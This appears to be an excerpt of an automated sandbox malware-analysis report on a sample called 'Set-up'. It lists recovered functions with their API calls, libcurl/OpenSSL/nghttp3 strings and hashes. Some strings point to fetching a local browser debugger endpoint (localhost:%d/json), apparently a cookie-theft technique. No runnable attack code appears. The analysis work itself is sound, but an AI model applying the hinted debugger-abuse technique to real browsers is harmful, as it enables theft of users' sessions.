                            • Instruction ID: 1ec4cfa5efd8a5f6dbf137cec1545751c24ad63bff641c6b036647eef468bf2c
                            • Opcode Fuzzy Hash: 7fae309444937eee491bddb193786f686a32974b545071b9ef0269265e6d9dca
                            • Instruction Fuzzy Hash: 86D125B1904265AFE710AA28EC42B7F3BD4FF51314F054438F88ADB292F7749D9487A2
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0087C37A
                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0087C476
                            • WSAGetLastError.WS2_32 ref: 0087C4AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLastmemcpystrcpy
                            • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                            • API String ID: 31095072-3036451936
                            • Opcode ID: 818f1013dec4959f80ebbacc902a87827676fa796bb193f0f0fe5eef7c6fe9f7
                            • Instruction ID: 1f42e1f7ea3101cf975addf64d768306d4282d4abd4228bfab95a9fc152c6104
                            • Opcode Fuzzy Hash: 818f1013dec4959f80ebbacc902a87827676fa796bb193f0f0fe5eef7c6fe9f7
                            • Instruction Fuzzy Hash: E85135B19083485BD710AB559C41BBEBBD4FFD1308F04882DF98DDB242E676E9848B93
                            APIs
                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A8EA90
                            • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00A8EAD9
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8EB98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno_stat64tolower
                            • String ID: Calling OPENSSL_DIR_read("%s")$Given path=%s$calling stat(%s)$file:$file_open$file_open_dir$file_open_stream$localhost/$providers/implementations/storemgmt/file_store.c
                            • API String ID: 3401003986-2019258128
                            • Opcode ID: f61de024b8dd1aa40cc8676703b806716dce30117364aaa645c9f024733dbbed
                            • Instruction ID: 23408f2f3046cb3cbc456bc57e3a1dbcb9249631f99d32ba9d31c40f32a265f4
                            • Opcode Fuzzy Hash: f61de024b8dd1aa40cc8676703b806716dce30117364aaa645c9f024733dbbed
                            • Instruction Fuzzy Hash: 4371F775E44300FADB20FFE0ED47B6ABB94AF81B64F044924F945662C3F6A5E51483A3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                            • API String ID: 0-3171374047
                            • Opcode ID: 51f07286d22aea725a26e2a9e767c44eeceac4134696d60c38c10c4c8a49deab
                            • Instruction ID: 96a3474c0d87949c16b9571ce78666b5bf3f35db265a432558c5388bddb48918
                            • Opcode Fuzzy Hash: 51f07286d22aea725a26e2a9e767c44eeceac4134696d60c38c10c4c8a49deab
                            • Instruction Fuzzy Hash: 23B19C71A04B05DBDB219B24C881BBA77A4FF51708F1A01B9F849C7243DB369E88D783
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008020D4
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008022D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: freemalloc
                            • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                            • API String ID: 3061335427-1249806554
                            • Opcode ID: 1ce59ad5a70fe936e586f756f57350bc1303f93dff7d679451e90349ab9fbc13
                            • Instruction ID: be1116eeed602fff245f5f376193f53a8459e5a0f4cc937b5640779482b83f92
                            • Opcode Fuzzy Hash: 1ce59ad5a70fe936e586f756f57350bc1303f93dff7d679451e90349ab9fbc13
                            • Instruction Fuzzy Hash: AB6184B49043099FDB40EFA8D88979EBBF4FF44314F018819E584EB391D77999848B92
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008A499C
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 008A4A0A
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 008A4A8E
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 008A4AA3
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 008A4AB8
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 008A4B1A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert$memcpy
                            • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                            • API String ID: 3718630003-1169204258
                            • Opcode ID: 9fd9621f14ec50ae37cbdf5a1d7f43da603ec5280b178dbfdbbb95a9b1414a73
                            • Instruction ID: ed12cf2e951fe2882684aa46eaceb30b17a7ce372796cfbf9a739f675b364dc5
                            • Opcode Fuzzy Hash: 9fd9621f14ec50ae37cbdf5a1d7f43da603ec5280b178dbfdbbb95a9b1414a73
                            • Instruction Fuzzy Hash: 09513571A04305AFEB109E28DC01BAB7BE9FF87314F044529F954D25D2E7B0A994C7A2
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00878C0E,?), ref: 009B45E3
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00878C0E,?), ref: 009B460A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcmp
                            • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                            • API String ID: 1004003707-1524119518
                            • Opcode ID: 094bb75815b3ef98aa7991032adb0268c0e52faf6da25d54ca800b9e36eca875
                            • Instruction ID: fbd87d17c6ed047010621f11f35562b8e8c42aeb7720b4e5b23924d820af0134
                            • Opcode Fuzzy Hash: 094bb75815b3ef98aa7991032adb0268c0e52faf6da25d54ca800b9e36eca875
                            • Instruction Fuzzy Hash: 5B41C675B443106BEA3076A56E43BA621EC4BA2B66F090425FE04752C3FE919D18A1B3
                            APIs
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00866884
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 008668AC
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008668C1
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00866973
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00866983
                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00866995
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpystrchr$atoistrlen
                            • String ID: [
                            • API String ID: 444251876-784033777
                            • Opcode ID: 3ecde7ba3dfcdbaab13d5d7dc3b938cf1eeebf2e953857a545cc8ff4ee12893d
                            • Instruction ID: caf7347ebaa7a8ce45837d83cf7c8618d1ea139bc2c9724fe5d49991f99c27b6
                            • Opcode Fuzzy Hash: 3ecde7ba3dfcdbaab13d5d7dc3b938cf1eeebf2e953857a545cc8ff4ee12893d
                            • Instruction Fuzzy Hash: 5CB165719083D5ABDB359A24C89173FBBD8FF55328F1A092DE8C6C6181FB25C8748392
                            APIs
                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00806467
                            Strings
                            • %d%02d%02d %02d:%02d:%02d, xrefs: 008066D5
                            • hsts.c, xrefs: 0080656B, 008065CF
                            • %s%s "%s", xrefs: 008064AA
                            • unlimited, xrefs: 008064A1
                            • mite, xrefs: 00806688
                            • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00806462
                            • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00806540
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: fwrite
                            • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                            • API String ID: 3559309478-3911685517
                            • Opcode ID: 2dc95fa627882b52a78f6a36905b8921b0a0f1da2fee86cc928e27f26ba4bb8e
                            • Instruction ID: 3922d3e83d0cab4d4db8ed822b6a4f73f56c99617d134482f866e310a8630ad7
                            • Opcode Fuzzy Hash: 2dc95fa627882b52a78f6a36905b8921b0a0f1da2fee86cc928e27f26ba4bb8e
                            • Instruction Fuzzy Hash: 8A81E5B2A04701ABEB509A24DC41B6B76E9FF94714F08462CF959C7292F731ED60C793
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0087DB9C,?,008A3BB8,00000000,?,?), ref: 008A6433
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                            • API String ID: 1222420520-1470553442
                            • Opcode ID: 55cf8c0742e3a247d4023c2d99276217c618c2d9a1aa0676dceaba64df9bb9a4
                            • Instruction ID: 89c408f7f614dc2a0f7d3d01a9077585558d719dcc0da50f4c86ed9d30f5b4dc
                            • Opcode Fuzzy Hash: 55cf8c0742e3a247d4023c2d99276217c618c2d9a1aa0676dceaba64df9bb9a4
                            • Instruction Fuzzy Hash: F6718A74A04344AFEB25DF28DC85BAEB7A1FF49300F048528F849D7691EB70E954CB52
                            APIs
                              • Part of subcall function 00825EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00825ED4
                              • Part of subcall function 00844F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00844F9E
                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0081EA9B
                              • Part of subcall function 008206F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00825663,?), ref: 008206F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$atoistrcpy
                            • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                            • API String ID: 2444498485-4197959747
                            • Opcode ID: fa8e2a7fe61e6f25e0061d24b8e7818d074dbd3d5d1dd3b207a94191fdf5fd15
                            • Instruction ID: d889a7bf6745fc8d9529535173ba7d8045167cdd9120eb3f7a742ef48c7528a8
                            • Opcode Fuzzy Hash: fa8e2a7fe61e6f25e0061d24b8e7818d074dbd3d5d1dd3b207a94191fdf5fd15
                            • Instruction Fuzzy Hash: BEF1F5759043046BEB209F28EC86BE63B98FF50714F084475FC49EE2D7E77199948762
                            APIs
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 009FA61C
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 009FA632
                              • Part of subcall function 009FA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,009FA654,?,PRIVATE KEY), ref: 009FA0BD
                              • Part of subcall function 009FA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 009FA0C8
                              • Part of subcall function 009FA0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 009FA0DF
                              • Part of subcall function 009738A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0097397E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcmpstrlen
                            • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                            • API String ID: 3853617425-3686562516
